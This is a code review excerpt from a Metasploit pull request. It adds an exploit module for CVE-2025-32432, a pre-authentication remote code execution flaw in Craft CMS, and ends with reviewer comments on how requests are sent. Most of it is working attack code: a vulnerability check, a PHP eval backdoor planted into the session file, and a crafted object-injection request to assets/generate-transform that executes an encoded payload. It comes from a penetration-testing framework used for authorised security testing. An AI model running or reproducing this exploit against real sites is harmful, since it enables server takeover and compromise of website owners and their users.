modules/exploits/linux/http/craftcms_preauth_rce_cve_2025_32432.rb

```diff
@@ -0,0 +1,203 @@
+      ]
+    )
+  end
+
+  def check
+    csrf = fetch_cookies_and_csrf
+    return CheckCode::Unknown('Could not retrieve cookies & CSRF') unless csrf
+
+    vprint_status("Using CSRF token: #{csrf}")
+
+    res = send_transform(csrf, datastore['ASSET_ID'], 'phpinfo')
+    return CheckCode::Unknown('No response from generate-transform') unless res
+
+    if res.body.include?('If you did not receive a copy of the PHP license')
+      return CheckCode::Vulnerable('License text detected')
+    end
+
+    CheckCode::Safe('License text not detected')
+  end
+
+  def php_exec_cmd(encoded_payload)
+    vars = Rex::RandomIdentifier::Generator.new
+    dis = '$' + vars[:dis]
+    encoded_clean_payload = Rex::Text.encode_base64(encoded_payload)
+    shell = <<-END_OF_PHP_CODE
+            #{php_preamble(disabled_varname: dis)}
+            $c = base64_decode("#{encoded_clean_payload}");
+            #{php_system_block(cmd_varname: '$c', disabled_varname: dis)}
+    END_OF_PHP_CODE
+    return shell
+  end
+
+  def exploit
+    phped_payload = target['Arch'] == ARCH_PHP ? payload.encoded : php_exec_cmd(payload.encoded)
+    final_payload = framework.encoders.create('php/base64').encode(phped_payload)
+
+    random_param_name = Rex::Text.rand_text_alphanumeric(rand(5..12))
+
+    first_payload = "<?=eval(\$_GET[\"#{random_param_name}\"]);die()?>"
+
+    print_status('Making initial request to push payload and get a CSRF token..')
+
+    craft_session_id, csrf = fetch_cookies_and_csrf(first_payload)
+    vprint_status("CraftSessionId: #{craft_session_id}")
+    vprint_status("Found CSRF token: #{csrf}")
+
+    print_status('Triggering code via assets/generate-transform')
+
+    json_data = {
+      'assetId' => datastore['ASSET_ID'],
+      'handle' => {
+        'width' => rand(100..500),
+        'height' => rand(100..500),
+        'as hack' => {
+          'class' => 'craft\\behaviors\\FieldLayoutBehavior',
+          '__class' => 'yii\\rbac\\PhpManager',
+          '__construct()' => [
+            {
+              'itemFile' => "/var/lib/php/sessions/sess_#{craft_session_id}"
+            }
+          ]
+        }
+      }
+    }.to_json
+
+    send_request_cgi({
+      'method' => 'POST',
+      'uri' => normalize_uri(target_uri.path, 'index.php'),
+      'vars_get' => { 'p' => 'actions/assets/generate-transform', random_param_name => final_payload },
+      'headers' => { 'X-CSRF-Token' => csrf },
+      'ctype' => 'application/json',
+      'data' => json_data,
+      'keep_cookies' => true
+    })
+  end
+
+  def fetch_cookies_and_csrf(payload_param = nil)
+    vars_get = { 'p' => 'admin/dashboard' }
+    vars_get['a'] = payload_param if payload_param
+
+    query_string = vars_get.map { |key, value| "#{key}=#{value}" }.join('&')
+
+    opts = {
+      'method' => 'GET',
+      'uri' => normalize_uri(target_uri.path, 'index.php') + '?' + query_string
+    }
+
+    res1 = send_request_raw(opts)
```

Comment:
`send_request_cgi` is preferred where possible.

```suggestion
    res1 = send_request_cgi(opts)
```

Reply:
> `send_request_cgi` is preferred where possible.

It's not possible to use send_request_cgi here because we absolutely must not encode the payload. Otherwise, we won't be able to retrieve it in plain text from the session file.

Reply:
Thanks for the help, I didn't know you could omit the encoding in send_request_cgi. I fixed this: https://github.com/rapid7/metasploit-framework/pull/20085/commits/332c61b6eafd4f022c97c751fa064d28e3cc2fe5.